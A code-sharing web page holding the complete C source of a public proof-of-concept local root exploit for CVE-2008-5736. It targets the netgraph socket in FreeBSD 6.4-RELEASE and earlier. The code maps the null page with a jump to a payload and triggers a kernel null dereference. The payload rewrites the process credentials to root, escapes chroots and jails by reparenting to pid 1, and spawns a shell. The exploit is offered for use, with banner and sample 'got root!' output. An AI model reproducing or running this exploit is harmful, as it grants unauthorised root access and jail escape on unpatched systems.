扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
/* * FreeBSD <= 6.4-RELEASE Netgraph Exploit * by zx2c4 * * * This is an exploit for CVE-2008-5736, the FreeBSD protosw * and loosely based on Don Bailey's 2008 exploit - * http://www.exploit-db.com/exploits/7581/ . The thing with * Don's exploit is that it relies on having a known location * of allproc, which means having access to the kernel or * debugging symbols, either of which might not be available. * Initial attempts included a general memory search for some * characteristics of allproc, but this was difficult to make * reliable. This solution here is a much more standard - get * the current thread, change its permissions, and execl to * shell. Additionally, it breaks out of chroots and freebsd * jails by reparenting to pid 1 and copying its fds. * * This reliably works on kernels on or below 6.4-RELEASE: * * $ gcc a.c * $ ./a.out * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~ * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~ * ~~~~~ greetz to don bailey, edemveiss ~~~~~ * * [+] mmapping null page * [+] adding jmp to pwnage in null page * [+] opening netgraph socket * [+] triggering null dereference * [+] elevating permissions * [+] got root! * # * * It's an oldie, but simple enough that someone needed * to write another PoC exploit at some point. * * cheers, * zx2c4, 27-2-2011 * */ #define _KERNEL #include <sys/types.h> #include <sys/time.h> #include <sys/param.h> #include <sys/proc.h> #include <sys/ucred.h> #include <sys/mman.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/filedesc.h> #include <sys/queue.h> #include <netgraph/ng_socket.h> #include <stdio.h> #include <fcntl.h> #include <unistd.h> #define PAGES 1 volatile int got_root = 0; int root(void) { struct thread *thread; asm( "movl %%fs:0, %0" : "=r"(thread) ); thread->td_critnest = 0; thread->td_proc->p_ucred->cr_uid = 0; thread->td_proc->p_ucred->cr_prison = NULL; struct proc *parent = thread->td_proc; while (parent->p_pptr && parent->p_pid != 1) parent = parent->p_pptr; thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir; thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir; thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir; thread->td_proc->p_pptr = parent; got_root = 1; return 0; } int main(int argc, char *argv[]) { printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); printf("[+] mmapping null page\n"); if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) { perror("[-] mmap failed"); return -1; } printf("[+] adding jmp to pwnage in null page\n"); *(char*)0x0 = 0x90; *(char*)0x1 = 0xe9; *(unsigned long*)0x2 = (unsigned long)&root; printf("[+] opening netgraph socket\n"); int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (s < 0) { perror("[-] failed to open netgraph socket"); return -1; } printf("[+] triggering null dereference\n"); shutdown(s, SHUT_RDWR); if (!got_root) { printf("[-] failed to trigger pwnage\n"); return -1; } printf("[+] elevating permissions\n"); setuid(0); setgid(0); if (getuid() != 0) { printf("[-] failed to get root\n"); return -1; } printf("[+] got root!\n"); execl("/bin/sh", "sh", NULL); return 0; } |
体验盒子
